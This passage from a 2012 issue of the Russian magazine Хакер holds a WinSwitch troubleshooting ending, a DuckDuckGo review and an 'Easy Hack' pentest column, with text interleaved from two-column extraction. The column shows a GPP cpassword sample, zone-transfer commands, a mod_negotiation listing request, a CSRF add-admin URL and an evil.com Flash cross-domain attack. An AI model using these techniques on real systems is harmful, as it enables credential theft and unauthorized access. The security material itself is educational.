я снова не обнаружил. Так что, скорее всего, проблема кроется
в Linux-версии. Переходим в линукс. Заходим в консоль и запуска- Сообщение «Service ant-vb (/services/udisks.service) successfully
ем уже линуксовый сервер в отладочном режиме: established» свидетельствует о том, что avahi стартанул успешно.
Может теперь все заработает? Запускаем сервер WinSwitch заново.
winswitch_server --debug-mode Сообщение об ошибке инициализации mDNS уже не присутствует.
На всякий случай проверим лог-файл апплета, который можно
В результате вываливаемся с ошибкой: найти по следующему пути ~/.winswitch/client/applet.log. Там тоже
обнаруживаются записи, свидетельствующие о наличии проблем
[EE] 2012/23/02 19:13:18 WinSwitchServer.check() running с mDNS. Записей о других критических ошибках — не обнаружено.
as root (uid=0) is currently broken Так как проблему с mDNS мы уже решили, запустив демон ahavi, то
теперь вроде бы все должно быть нормально. Выключаем сервер,
И снова общение с официальным сайтом прояснило ситуацию. который мы запустили вручную, и идем в меню, чтобы запустить
Оказывается, сервер и апплет нельзя запускать под рутом (а у меня апплет. Бинго! С этого момента все заработало.
как раз была открыта консоль с правами рута). Ну что ж, попробуем
проделать тот же трюк под обычным пользователем. Запускаем ИСПОЛЬЗОВАТЬ ИЛИ НЕТ?
сервер в режиме отладки под обычным пользователем. И ищем WinSwich – это вполне работоспособная реализация отличной
в консоли все строки, начинающиеся на [DD] (отладочные сообще- идеи, которую я успешно использую уже несколько недель. Уверен,
ния). Пролистывая лог из конца в начало, обратим внимание на что очень скоро появятся коммерческие проекты, эксплуатирую-
стек вызовов функций. Похоже, тут произошла какая-то ошибка, щие подобный подход, но уже с более человеческим интерфейсом,
и программа выкинула нам traceback. Смотрим, что вызывалось простой настройкой и — в идеальном варианте — прозрачным
последним: переносом окон из одной системы в другую (на случай, если два
компьютера стоят рядом). Последнее несложно реализовать, если
AvahiPublisher.__init__(Window Switch for ant on скомбинировать проект WinSwitch и Direct Input, позволяющий
ant-vb,32123,_shifter._tcp.,,,['username=ant', 'ssh_ расшарить между стоящими рядом компьютерами клавиатуру
tunnel=False', 'version=0.12.11', 'ID=8796747971533'],-1) и мышку. z

ХАКЕР 04 /159/ 2012 039

PC ZONE Мария «Mifrill» Нефедова ([email protected])

«GOOGLE
СЛЕДИТ
ЗА ТОБОЙ.
МЫ — НЕТ»
10 ПРИЧИН ОБРАТИТЬ ВНИМАНИЕ
НА ПОИСКОВИК DUCKDUCKGO.COM
Каким поисковиком ты обычно первый раз о таком слышишь? Я начинает напрягать. Не надо нам навязывать

пользуешься? Google или В тоже. Но ведь так было когда-то и с

Google. DuckDuckGo — это гибридный
G+ — мы и сами решим, использовать социаль-
ную сеть от Google или нет. DuckDuckGo в свою
Яндексом? Или, быть может, ты поисковик, главные черты которого — класс- очередь является классическим поисковиком,
ный поиск, отсутствие поискового спама, каким был Google в самом начале своего
по какой-то причине юзаешь минимальное количество рекламы (ее можно развития. И что здорово, — он отлично ищет
Bing? А ведь инструментов для полностью отключить в настройках) и щепе- информацию! Правда, пока только на англий-
тильное отношение к модному на западе слову ском языке: с русскоязычным сегментом сети
поиска в интернете гораздо «privacy»: DuckDuckGo не следит за пользова- у него явные проблемы. Поисковик уже давно
больше, и помимо закрытых телями, сохраняя их анонимность. Мы нашли приглянулся гикам из Силиконовой долины.
десять причин, почему его стоит по меньшей В прошлом году аудитория составляла всего
коммерческих поисковиков, мере взять на вооружение. 200 000 человек в день, а в этом сервис уже
шпионящих за каждым твоим перешагнул отметку в 1 000 000 посетителей
Это просто поиск. Давно прошли те ежедневно и, если верить статистике
шагом, существуют отличные
гиковские альтернативы. Одна 1 времена, когда Google был просто
поисковиком, а на «чистой» странице
(duckduckgo.com/traffic.html), эта цифра
продолжает расти. А с ноября 2011 года
из таких альтернатив — Duck- выдачи аскетично выводились результаты DuckDuckGo стал поисковиком по умолчанию
поиска. Сейчас же нас пичкают рекламой Linux Mint 12. Это, на минуточку, самый
DuckGo.com. и дополнительными сервисами. Взятый популярный десктопный дистрибутив Linux на
поисковиком путь на социализацию тоже сегодняшний день.

040 ХАКЕР 04 /159/ 2012

 «Google следит за тобой. Мы — нет»

Главная страница DuckDuckGo аскетична, чиста и навевает Вот так продвигал свой поисковик Вайнберг. Этот билборд Поисковик уже сегодня может похвастаться тем, что был
мысли о Google. висел в Сан-Франциско, и Гэбриелу это обходилось в 7 000 удостоен внимания крупных изданий.
$ в месяц.

Никакой слежки за пользователями. цию SMS и типы звонков. Страшно? А ведь это этого пока небольшого, но гордого поис-
2 Если верить создателям, то здесь
царит полная анонимность. Название
даже не самое скверное. Google может собирать
не только историю твоих звонков, он также
ковика, в красках повествующий об истории
поиска в целом и о том, почему сбор данных
этой статьи взято из главного лозунга проекта: читает твою переписку и знает все о твоих пере- о пользователях — это очень и очень плохо.
«Google следит за тобой. Мы — нет». Замечал движениях с точностью до пары метров за
ли ты, как реклама в поисковиках умело последнюю пару лет. Благодаря синхронизиро- В DuckDuckGo практически отсутствует
подстраивается под те запросы, которые ты
делал ранее? На сайте http://donttrack.us
ванным с Gmail контактам знает твоих друзей
и знакомых, а основываясь на подписках
3 спам, которым забиты все коммерче-
ские поисковики. Надолго ли это, увы,
приводится отличная демонстрация того, как и запросах к поиску — знает о твоих интересах. неизвестно, но сейчас результаты поиска
это происходит. Ситуация стала особенно А еще знает о твоих покупках и хранит твои удивляют своей чистотой и точностью. На
актуальной после того, как Google сменил свою документы в Google Docs. сегодня можно сказать точно, что SEO-
политику конфиденциальности. Скажи честно, DuckDuckGo не хранит IP-адреса, не ведет ло- оптимизаторам DuckDuckGo пока по барабану,
ты читал новое соглашение о конфиденциаль- гов пользовательской информации и исполь- и это радует.
ности? А между тем с 1 марта 2012 оно вступило зует куки только тогда, когда это действи-
в силу. Согласно некоторым пунктам, Google тельно необходимо. Создатель поисковика Гибридный поисковик дает больше
в открытую декларирует сбор телефонных
логов, то есть номера телефонов, номера
заявляет: «DuckDuckGo не собирает никакую
личную информацию пользователей и не
4 результатов. Результаты поиска
DuckDuckGo агрегируются из
телефонов вызываемых абонентов, номера для делится ей. Вот и вся наша политика конфи- пятидесяти разных источников, включая
переадресации, дату и время звонков, денциальности». По адресу duckduckgo.com/ Yahoo! Search BOSS, Wikipedia, Wolfram Alpha
длительность звонков, маршрутную информа- privacy.html ты найдешь настоящий манифест и собственного поискового робота. Одним

СИСТЕМА GOODIES

Чтобы лучше понять одну из самых Помимо перечисленного наличествуют точное время в любом городе мира и так далее.
прогрессивных фишек поисковика — goodies — многочисленные полезности, связанные Например, ответом на запрос «area of china»
предлагаем тебе несколько примеров. Начнем с математическими выражениями, (площадь Китая) будет точное, как в аптеке:
с технических. различными формулами, конвертацией, «3.705 million mi2 (square miles) (world rank:
• Запрос «ip address» поможет тебе узнать трансформацией и так далее, далее, далее. 4th), assuming china is a country» (3.705 млн.
свой IP :). Если же свой собственный Также поддерживается немало так называемых квадратных миль (4-я по величине страна
IP’шник тебя не интересует, можешь ввести казуальных goodies: в мире), если под словом «китай» имелась
в поисковую строку любой уже известный • Поиск по датам и фактам. Спроси у Duck- в виду страна).
адрес, скажем, 64.207.122.151, и DuckDuckGo DuckGo: «death date of lincoln» (дата смерти • Реализован поиск по различным ID, будь
сообщит тебе, к какой географической точке Линкольна), и вверху страницы поисковой это трекинг-номер посылки (вводишь
IP относится, а также покажет ее на карте: выдачи ты увидишь строку «Answer: номер отправления в строку поиска
«64.207.122.151 is in: Cheyenne, Wyoming, Saturday, April 15, 1865» (Ответ: суббота, 15 и просто нажимаешь Go!, очень удобно),
United States (82002)». апреля, 1865). международный стандартный номер
• Для чего нужны goodies useragent, whois • Конечно, есть в DuckDuckGo конвертер книги или ISBN, телефон и многое, многое
и им подобные, объяснять, надеюсь, не различных величин и калькулятор, как же другое.
нужно. без них? • Рандомные goodies особенно забавны.
• Запрос вида «U+0153» даст ответ: «character • Имеется множество географических good- Запрос «heads or tails» (орел ли решка) —
= 339: ое — Latin small ligature oe; Unicode = ies, а также goodies, связанных со временем не что иное, как возможность подбросить
U+0153; Decimal = 339; HTML = &#339;». и часовыми поясами. Кстати, поисковик виртуальную монетку. А ведь еще есть
• Для генерации паролей и ключевых фраз пользуется картографическим сервисом random number, roll die, random word и даже
используй «password * strong» и «passphrase OpenStreetMap. сакраментальное — this or that or none. Для
* words», где * — любое цифровое значение. Возможен поиск места на карте по заданным хардкорщиков предлагается вариант roll
Так же можно генерировать uuid, guid. координатам и по адресам, можно узнать 3d12 + 4.

ХАКЕР 04 /159/ 2012 041

PC ZONE

словом, DuckDuckGo — своеобразная список bang’ов доступен здесь: duckduckgo. Впрочем, нужно заметить, что в случае
оппозиция Google и всем коммерческим com/bang.html (предупреждаем — он огромен). формулировки запросов на русском языке поля
поисковикам в целом, которая просто не могла «ответ» ты, скорее всего, не увидишь. У Wolfram
рано или поздно не появиться. Отдельно стоит Моментальный ответ. Когда в поис- Alpha, к которому обращается DuckDuckGo,
рассказать про !bang. Данная команда
позволяет напрямую обращаться к другим
5 ковике можно набрать «random
number» (случайное число), «perimeter
с великим и могучим пока не слишком хорошо.

поисковым машинам и к сотням сайтов. triangle 1.5 2 3.2» (периметр треугольника со Гибкая настройка. В настройках
Скажем, тебе нужно найти какой-либо
конкретный товар на «Амазоне». Допустим, это
сторонами 1.5, 2, 3.2), «md5 this» (посчитать
md5-хэш для слова «this») и тут же получить
6 поисковика ты можешь легко
отключить показ рекламы, задать
часы. Набери в поисковой строке «!amazon ответ — это называется goodies. Это одна из регион, включить HTTPS по умолчанию,
watch» (или просто «!a watch»), и автоматиче- самых убойных фишек поисковика, и таких указать параметры открытия ссылок и даже
ски попадешь на amazon.com, в уже готовую goodies действительно много — как техниче- настроить внешний вид DDG. Практически
поисковую подборку с часами. Благодаря этой ских и математико-прогерских, так и казуаль- каждый аспект поведения поисковика можно
команде можно легко искать на !youtube, ных (подробнее читай во врезке). К слову, оптимизировать для себя, и это приятно.
!twitter, !wikipedia, в блогах, репозиториях и на поисковик по многим вопросам сверяется
сотнях других ресурсов. Кстати, также с Wolfram Alpha — базой знаний и набором Система горячих клавиш. Плох тот
работают сокращения: !g (google), !i (images), !yt
(youtube), !wiki и так далее. Дополнять список
вычислительных алгоритмов. Благодаря этому
есть возможность ввести в строку конкретный
7 ресурс, который в наши дни не
поддерживает хоткеи. У DuckDuckGo
bang’ов могут и сами пользователи, для этого вопрос и получить на него конкретный ответ с этим полный порядок: общаться с сайтом
достаточно заполнить простую форму. Полный прямо на странице, не проходя по ссылкам. можно вообще без использования мыши или

Реклама в DuckDuckGo. Легко отключается в настройках.

Примерно сотая часть шорткатов !bang. Их действительно ОЧЕНЬ много. Некоторые вариации goodies.

042 ХАКЕР 04 /159/ 2012

 «Google следит за тобой. Мы — нет»

тачпада. Ниже — маленькая подсказка. Работает по защищенным протоко- Много дополнительных плюшек.
Передвижение по сайту:
Ç или j — следующий результат;
8 лам. У DuckDuckGo есть короткое
доменное имя http://ddg.gg (это,
10 Гики любят DuckDuckGo, поэтому нет
ничего удивительного в появлении
È или k — предыдущий результат; к слову, на 4 символа короче, чем google. вспомогательных инструментов, которые
/ или h — к поисковой строке; com:), которое редиректит посетителя на могут сделать работу с поисковиком еще
esc — выйти из поисковой строки; защищенную SSL-версию сайта — https:// удобнее. Уже сейчас есть специальные
t — наверх; duckduckgo.com. мобильные приложения для Android и iOS
m — к первому результату; Поисковиком можно пользоваться через Tor. (другие в разработке). Поиск можно встроить
1 или ! — открыть выпадающее меню !bang. Адрес внутри сети — 3g2upl4pq6kufc4m.onion. прямо в систему с помощью проектов вроде
Открытые результаты: MultiSeeker (bit.ly/dhbIVF). Также есть
Enter или l или o — открыть подсвеченный DDG можно использовать как прокси. несколько аддонов для популярных браузе-
результат или сразу открыть самый первый;
Ctrl/Cmd+Enter — открыть результат на фоно-
9 Команда «!proxy адрес-сайта»
позволяет зайти на любой сайт через
ров. Создатели даже подняли чатбота (ye.gg/
chatbot), который работает через XMPP
вой вкладке; прокси. Для этой цели DuckDuckGo использу- (Jabber). Результаты можно получить
d — поиск по конкретному сайту (который вы- ет различные бесплатные прокси (что, правда, моментально, отправив сообщение на адрес
делен в результатах). плохо сказывается на скорости). [email protected]. z

РЕТРОСПЕКТИВА

DuckDuckGo — проект одного единственного принимает. «Это было бы неправильно, ведь и доступна любому желающему на GitHub
энтузиаста Гэбриела Вайнберга. Лишь мы некоммерческая компания», — поясняется (github.com/duckduckgo).
после получения инвестиций у поисковика на сайте. Вместо donate’ов пользователям Откуда взялось это дурацкое название? Оно
появилось несколько постоянных сотрудников предлагают активнее нести информацию было выбрано практически случайно. В одном
и собственный офис в американском городе о DuckDuckGo людям. из интервью Гэбриел пояснил: «На самом деле
Паоли. Гэбриел — выходец из Массачусетского DuckDuckGo написан на Perl и JavaScript в один прекрасный день оно просто выскочило
технологического института (MIT). Поисковик с использованием библиотеки YUI. Для у меня в голове, и просто мне понравилось».
для него — далеко не первый проект. Его обслуживания огромного количества Возможно, это связано с популярной в США
социальную сеть The Names Database купила клиентов используется связка nginx, детской игрой под названием «Duck Duck
компания United Online за 10 000 000 долларов FastCGI и memcached, запущенные FreeB- Goose». Кстати, в качестве альтернативы
США. Изначально DuckDuckGo самостоятельно SD и Ubuntu. При этом используются как глаголу «погуглить» (Google it), Вайнберг
финансировался лично Вайнбергом, но сейчас собственные сервера, так и мощности Amazon предлагает использовать «Duck it!» — то есть
существует также и за счет небольшого EC2. Для хранения данных используются «подакать», если транслитерировать это
количества рекламы (которую, напоминаем, PostgreSQL+bucardo, CDB, Solr, BerkelyDB, S3. на русский, или «поуткать», если дословно
можно отключить). Пожертвований проект не Часть исходного кода DuckDuckGo открыта перевести :).

ДРУГИЕ МАЛОИЗВЕСТНЫЕ ПОИСКОВИКИ

Blekko (blekko.com) YaCy (yacy.net) Ixquick (ixquick.com) Nigma (нигма.рф)

Запущен в конце 2010 года. Идея Поисковик YaCy работает по прин- Поисковая система компании Рунету тоже есть чем похвастать-
Blekko проста — невозможно ципу P2P. Хранение поискового Ixquick тоже ставит во главу угла ся. Nigma — российская интел-
создать поисковик, который под- индекса и обработка запросов анонимность и безопасность лектуальная метапоисковая
ходил бы всем, поэтому у каждого осуществляются не на цен- пользователей. Ixquick, как система, первая кластеризующая
должна быть возможность влиять тральном сервере, а в распре- и DuckDuckGo, не сохраняет ин- поисковая система в Рунете.
на результаты поиска. Исполь- деленной сети пиров Freeworld. формацию ни о запросах пользо- Осуществляет поиск как по свое-
зует слэштеги для сужения Присоединиться к сети может вателей, ни о них самих. Кстати, му индексу, так и по индексам
области поиска. Например, при любой желающий, достаточно по утверждениям специалистов Google, Yahoo, Bing, «Яндекс»,
помощи слэштега «/news» можно лишь установить ПО. Конечно, компании Ixquick, их поисковые Rambler, AltaVista, Aport. Проект
выполнить быстрый поиск по здесь царит полная анонимность. системы первыми на рынке нача- создан при поддержке факуль-
новостным сайтам. Не так давно Распределенная сеть пиров и от- ли предлагать SSL-шифрование тетов ВМиК и психологии МГУ,
«Яндекс» инвестировал в Blekko крытый код гарантируют YaCy (начиная с 2009 года). а также Стэндфордского универ-
15 000 000 долларов. устойчивость и защищают его от ситета.
попыток цензуры.

ХАКЕР 04 /159/ 2012 043

ВЗЛОМ / EASY HACK Алексей «GreenDog» Тюрин, Digital Security (twitter.com/antyurin)

EASY
HACK
ВЫТАЩИТЬ ИЗ СИСТЕМЫ ПАРОЛЬ ОТ ЛОКАЛЬНОЙ УЧЕТКИ
ЗАДАЧА

РЕШЕНИЕ
Как же давно я не писал о такой прекрасной виндовой фиче,
как групповые политики! Тема их обхода стала особенно акту-
альной после появления исследования секьюрити-группы ESEC
(goo.gl/zDJFT).
Для начала давай уточним задачу. Итак, на гипотетической
рабочей станции нам нужно вытащить и расшифровать пароль
от локальной учетной записи, которая была создана при помощи
групповых политик. Если я не ошибаюсь, то начиная с Windows
Server 2008 Microsoft ввела специальное расширение для ло-
кальных политик под названием Group Policy Preferences (GPP).
В Windows Vista и Windows 7 локальные политики поддержива-
Файл с групповой политикой для создания пользователя
ются нативно, а вот для XP потребуется поставить специальное
обновление. Так вот, одной из добавленных функций была воз-
можность создавать локальные учетные записи для группы до-
менных хостов. Функция, безусловно, полезная, и, как уверяют
люди из ESEC, часто используемая администраторами. Вот такие
учетки мы и научимся доставать.
Теперь давай посмотрим, где же эти учетки создаются. Для
этого мы должны найти на контроллере домена раздел «Group
Policy Management» (gpmc.msc). В нем создаем новую по-
литику, а затем в «Local Users and Groups» ветки «Computer
Configuration» — нового пользователя. В процессе создания
мы указываем пароль и задаем другие стандартные настройки
аккаунта. После этого при обновлении политик на доменных
хостах наш пользователь будет успешно создан. Создание пользователя при помощи групповых политик

044 ХАКЕР 03 /158/ 2012

 EASY HACK

Дальше ребята из ESEC посмотрели, как все происходит изну- subAuthority=""

три, и как данные о групповых политиках передаются с контрол- userName="MyLocalUser" />
лера на хосты. Итог оказался вполне предсказуемым. </User>
При обновлении политик доменный хост залезал на шару </Groups>
SYSVOL-домена и скачивал XML-файл c политикой. В нем как раз
и находились имя пользователя и пароль. В общем, все стандар- Здесь необходимо уточнить еще несколько моментов. Во-
тно. Пример такого файла: первых, данный файл доступен всем доменным пользователям,
даже непривилегированным. Во-вторых, пароль расшифровать
<?xml version="1.0" encoding="utf-8"?> очень просто, ведь хотя и используется AES 256, но вот ключ
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"> прошит в самой ОС, то есть известен априори. На нашем диске
ты сможешь найти питоновский скрипт для расшифровки таких
<User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" паролей.
name="MyLocalUser" За остальными подробностями советую обратиться к ориги-
image="0" нальному исследованию ESEC. Хотя оно и не является исследова-
changed="2011-12-26 10:21:37" нием в своем первоначальном смысле (это скорее доведение до
uid="{A5E3F388-299C-41D2-B937-DD5E638696FF}"> хакерских масс официально описанной фичи), Microsoft в описании
GP четко предупреждает, что данные в GPP передаются в незащи-
<Properties action="C" fullName="" description="" щенном виде.
cpassword="j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw" И что использовать функционал требуется с большой осто-
changeLogon="0" noChange="0" рожностью, особенно при создании привилегированных учеток
neverExpires="0" acctDisabled="0" в ОС.

ПОЛУЧИТЬ СПИСОК ХОСТОВ ИЛИ DNS ZONE TRANSFER

ЗАДАЧА

РЕШЕНИЕ
При проведении любого ИБ-исследования в первую очередь нам
требуется ответить на вопрос «а кого же атаковать»? Это важно,
так как практически любая атака чаще всего проводится против
какой-то организации, у которой может быть очень много ресурсов.
А нам необходимо определить среди них самое слабое звено или
наиболее критичный ресурс. DNS-имя хоста может дать прилич-
ный профит в этом смысле, так как зачастую оно отражает свой
функциональный смысл. Например, в корпоративных сетях вполне
могут присутствовать такие имена как «buhgal» или «bank», до ко-
торых тебе, конечно же, захочется добраться. Как пример, для веба
можно взять поиск «скрытых» доменов вроде admin.example.com.
Одним из простейших методов определения имен хостов
является обратный DNS-запрос (reverse), когда мы запрашиваем
у DNS-сервера имена хостов на основании их IP-адресов. Однако
для корпоративок этот метод шумноват, так как необходимо запра-
шивать имена для всех хостов по очереди, а для веба он не совсем
оправдан, — домены могут находиться не на смежных IP-адресах.
Но если нам повезет, и DNS-сервер не совсем корректно настро-
ен, то мы сможем получить всю необходимую информацию разом.
Да-да, я говорю про DNS Zone Transfer. Для тех, кто не в курсе, эта
Zone transfer для одного из корневых серверов домена .arpa
документированная функция DNS предназначена для того, чтобы
делиться своими записями о зоне. При корректной настройке Zone
Transfer должен быть разрешен с первичного DNS-сервера только дить zone transfer. Если точнее, то 65 из 312 TLD позволяют получить
на вторичный, но об этом часто забывают. все свои записи. Жаль, конечно, что в этом списке отсутствуют .com
Итак, чтобы получить зону, нам требуется подключиться к 53 и .ru, но все равно приятно. Полученный им список на 250 заархи-
порту DNS-сервера по протоколу TCP и создать AXFR-запрос. вированных мегабайт можно получить по ссылке goo.gl/uVS1X. Но
Практически это можно выполнить, используя только функционал давай попробуем собрать такой список сами:
стандартной виндовой команды nslookup, но практичней всего 1. Используем стандартную команду nslookup.
будет использование Nmap. 2. Выбираем DNS-сервер от Гугла: server 8.8.8.8.
3. Выставляем тип искомых записей: Set type=NS.
nmap --script dns-zone-transfer.nse \ 4. Делаем запрос на домен arpa и получаем обслуживающие его
--script-args dns-zone-transfer.domain=<domain> DNS-серверы: arpa.
5. Подключаемся к одному из DNS-серверов в списке: server b.root-
Но все это классика. Приведу в пример небольшое исследова- servers.net.
ние, проведенное небезызвестным экспертом HD Moore. Он про- 6. Трансферим зону для указанного домена: ls –d arpa.
сканировал основные DNS-серверы от их TLD (top-level-domain: .net, Конечно, arpa – это так, для забавы, много интересной инфор-
.org, .xxx и так далее) и вывел, что многие из них разрешают прово- мации мы не получим. Но общая идея, думаю, понятна.

ХАКЕР 03 /158/ 2012 045

ВЗЛОМ / EASY HACK

ПРОСМОТРЕТЬ ЛИСТИНГ ФАЙЛОВ В APACHE ЗАДАЧА

РЕШЕНИЕ
Для начала давай представим себе ситуацию, что мы исследуем foo.htm.en и foo.htm.de, то по запросу /foo.htm будет отдан тот,
какой-то сайт. На этом сайте крутится Apache. Первым делом же- который совпадает с пришедшим от клиента заголовком «Accept-
лательно понять, какой же движок используется нашим ресурсом. Language».
Если точно определить CMS, то, используя общеизвестные Но еще более интересным является поведение модуля с ис-
уязвимости, произвести взлом будет очень просто. Но если это пользованием параметра MultiViews. Если он включен, то при
что-то нестандартное и без доступных исходников, то могут воз- тестовом запросе «foo» Apache проводит поиск в данной дирек-
никнуть проблемы. Хотя многое зависит от самого приложения. тории по маске «foo.*», а потом отдает пользователю «наилучший
В любом случае я не думаю, что нужно сразу же погружаться вариант».
в дебри взлома, стоит еще немного пособирать информацию. Что Включение MultiViews производится за счет записи строки
мы ищем? Любые полезные нам данные. Например, исходники, Options MutiViews в секции виртуальных хостов или конкретных
файлы бэкапов, конфиги. Как искать? директорий. Хорошо, но что же все это нам дает? Тебе ответит ИБ-
Первым делом желательно и обязательно проверить возмож- исследователь Стефано Ди Паола (Stefano Di Paola, goo.gl/ly8HK):
ность листинга директорий на сервере, и, если она присутствует, частичный листинг файлов. Как? Все очень просто. В 2007 году
мы сразу поймем, что можем получить. Например, на одном из Стефано помучал данный функционал и выявил, что при уста-
сайтов, с которыми я когда-то имел дело, как раз и присутствовал новке некорректного заголовка «Accept» при запросе к серверу
такой листинг, а в самом приложении, как оказалось, находилось последний с помощью логики mod_negatiation вернет нам список
всего пара php-скриптов, которые просто подгружали осталь- абсолютно всех файлов с запрашиваемым именем, так как не
ной функционал из inc-файлов. Так как файлы типа inc Apache сможет выбрать «лучший вариант». Смотри, если мы запраши-
не считает какими-то уж особенными и позволяет их абсолютно ваем файл foo без расширения, но с заголовком «Accept», то нам
спокойно скачивать, то я очень быстро и легко получил почти вернется «наилучший» вариант:
все исходники сайта. Но так везет не всегда. А что делать, если
листинга нет? Классика пентеста – это брутфорс по словарю. Не- Запрос
когда я писал об этом и упоминал тулзу DirBuster. Но брутфорс — GET /foo HTTP/1.1
штука грубая, хотя и вполне рабочая. Accept: */*
Но давай ближе к теме. Всем известный веб-сервер Apache
содержит интересный модуль под названием mod_negatiation. Ответ
Данное расширение чаще всего включено по дефолту. Если HTTP/1.1 200 OK
говорить по-простому, то отвечает оно за «умную отдачу контен- Server: Apache/2.0.55
та». То есть, если пользователь запрашивает какой-то ресурс Content-Location: foo.php
(страницу), то ему будет отдаваться страница, которая подходит Vary: negotiate,accept
больше всего. Например, если на сервере хранится пара файлов TCN: choice

Частичный листинг файлов. Бэкап найден – качаем

046 ХАКЕР 04 /159/ 2012

 EASY HACK

A если мы запрашиваем то же самое, но с некорректным за- когда файлы бэкапов хранятся рядом, случаются очень часто, –
головком «Accept», то нам вернется практически полноценный многие программы автоматом создают их при редактировании
листинг: основных файлов. Важным ограничением способа является то,
что в вывод веб-сервера попадают только те файлы, чье рас-
Запрос ширение присутствует в конфиге апача (AddType). То есть файл
GET /foo HTTP/1.1 с расширением .php~ в листинг, к сожалению, не попадет.
Accept: xxx/blabla Думаю, здесь важно подчеркнуть, что описанное выше по-
ведение Apache — нормально. То есть разработчики не собираются
Ответ менять его. И как уже было сказано выше, это свойственно всем
HTTP/1.1 406 Not Acceptable основным веткам Apache. Хотя данная фича в любом случае не
Server: Apache/2.0.55 избавляет нас от необходимости перебора, но мы вполне можем
Alternates: {"foo.bak" 1 {type application/x-trash} {length 3}}, воспользоваться уже имеющимися данными (именами страниц)
{"foo.php" 1 и не перебирать вслепую.
{type application/x-httpd-php} {length 3}} В Metasploit присутствует соответствующий модуль (auxiliary/
scanner/http/mod_negotiation_brute), проводящий брутфорс с уче-
Vary: negotiate,accept том этой фичи, да и сканер от Acunetix имеет аналогичный функ-
TCN: list ционал. В качестве простейшего примера – чекер mod_negotiation
с использованием nmap:
Что это может дать? Конечно, все сильно зависит от ситуации, но
в основном это попытка добраться до бэкапов. Кстати, ситуации, nmap --script=http-apache-negotiation –p80 –sV

ВЫПОЛНИТЬ ДЕЙСТВИЯ ОТ ИМЕНИ

ПОЛЬЗОВАТЕЛЯ В КАКОЙ-ЛИБО CMS ЗАДАЧА

РЕШЕНИЕ дефолту на всех компьютерах (привет яблочникам :). А во-вторых,

Для начала давай расширим задачу. Есть пользователь, залоги- предоставляет много возможностей по взаимодействию с сетью.
нившийся в какую-нибудь веб-систему (например в админку). Есть В самом простом виде атака с использованием flash будет иметь
хакеры, которые хотят получить привилегированный доступ в эту следующий вид. Есть evil.com – хост атакующего со специальной
систему. Для приличия добавим возможность подсунуть этому флэшкой, и есть victim.com с нужными нам данными. Когда юзер
пользователю произвольную ссылку или проснифать его незашиф- зайдет к нам на evil.com, флэш автоматически запустится и вы-
рованный трафик (хотя сама админка будет находиться за https’ом). полнит загрузку страницы с victim.com, причем используя родные
Самый простой и действенный способ — это, наверное, CSRF: кукисы пользователя! Далее все стандартно, – из страницы доста-
ем токен, подставляем его в запрос и выполняем.
https://victim.com/admin.php?adduser=1&user=hacker& Все круто? Как бы ни так. Здесь нам мешают same origin
password=hacker policies. Ведь evil.com – один домен, victim.com – другой, а следова-
тельно взаимодействие по флэшу запрещено. Однако существует
Если мы заставим браузер перейти по этой ссылке, то в системе и вполне легальный способ, разрешающий такое «общение», — это
будет создан новый пользователь. Но это возможно только в том файл crossdomain.xml. В нем указывается, что можно делать флэ-
случае, если веб-приложение уязвимо к таким атакам. К счастью, шу. Он должен быть расположен в самом корне сервера victim.com.
во все большее количество ПО внедряются всяческие механизмы Таким образом, когда флэш-ролик пытается прочитать страничку
защиты от CSRF. Самый распространенный – токены. К каждому за- с victim.com, флэш сначала читает victim.com/crossdomain.xml и на
просу на странице добавляется токен, который действителен толь- основе него уже делает вывод, разрешено ли подключаться к этой
ко для одного запроса. Таким образом мы получаем ссылку вида странице. В настоящий момент флэш поддерживает целый набор
ограничений. Я не буду описывать все, коснусь лишь основных,
https://victim.com/admin.php?adduser=1&user=hacker& общая спецификация от adobe находится по адресу goo.gl/A02R1.
password=hacker&token=long_random_bukva_cifra Вот пример:

Да, CSRF уже не прокатит. Что дальше? Конечно же, XSS. С по- <?xml version="1.0"?>
мощью этого вида атак мы сможем загрузить нужную страницу, <!DOCTYPE cross-domain-policy SYSTEM
вынуть токен и создать ядовитый запрос (плюс много еще всякого "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
страшного). Но у XSS есть пара проблемных моментов. Хотя они <cross-domain-policy>
и являются самым распространенным видом багов на сегодняшний <site-control
день, но в основном это касается reflected XSS (то есть когда код permitted-cross-domain-policies="master-only"/>
попадает из запроса), ведь stored XSS (когда мы можем добавить <allow-access-from domain="*.victim.com" secure="false"/>
контент в страницу) бывает не часто. Но во многие браузеры натив- <allow-access-from domain="www.microsoft.com"/>
но или с помощью плагинов встроена хорошая защита от reflected </cross-domain-policy>
XSS. Классический пример – IE. И здесь без извращений и/или
социальной инженерии защиту не обойти. Поясню некоторые моменты. Главный пункт здесь, конечно
Давай посмотрим, можем ли мы сделать что-то еще? Ответ – же, это allow-access-from, указывающий на то, с каких серверов
flash. У него есть несколько плюсов. Во-первых, сейчас он стоит по доступ разрешен. Здесь это любые поддомены victim.com и один —

ХАКЕР 04 /159/ 2012 047

ВЗЛОМ / EASY HACK

Microsoft. Master-only указывает на то, что используется только быть разрешение от корневого файла (значение директивы
crossdomain.xml, лежащий в корне, хотя есть и другие варианты, «site-control» находится не в положении «master-only»), а до-
но об этом дальше. Вот теперь у нас появляется возможность ступ флэш-ролику будет разрешен только в данную директорию
для маневров. Например, с помощью DNS или NBNS-spoofing мы или ее поддиректории. Таким образом, у нас есть небольшая
можем представиться одним из поддоменов victim.com и по- возможность либо найти альтернативные файлы на victim.com,
лучить, таким образом, возможность использовать флэш на либо залить xml’ку.
полную. Кроме того, мы можем искать уязвимости уже во всех Кстати, наиболее простым и частым багом здесь является
этих доменах и через них атаковать пользователей victim.com. неправильное использование директивы <allow-access-from
Далее нам интересен атрибут secure (по-дефолту «true»), domain=»* «>. В данном случае мы можем обращаться к жертве
указывающий на то, нужно ли флэшу обращаться к данному хо- с любого из хостов, а также производить почти любые действия
сту только c https. То есть в данном случае (false) мы можем про- от чужого имени. Много ли таких сайтов? Прилично. Подроб-
вести на victim.com атаку Man-in-the-middle, а затем внедрить ности смотри в научной работе про анализ Alexa Top 50 000 от
нашу флэшку в HTTP-ответ от сервера. Получается, флэшке наших коллег из Сан-Диего (goo.gl/rlCL1).
будет разрешено «общаться» и с https'ом этого домена. Еще хотелось бы вспомнить про такую альтернативу флэшу
Также хочу добавить еще несколько важных замечаний. как Silverlight от Microsoft. У них почти аналогичная система
Во-первых, когда флэш-ролик отправляет куда-либо запрос, кроссдоменного взаимодействия, только с несколькими отли-
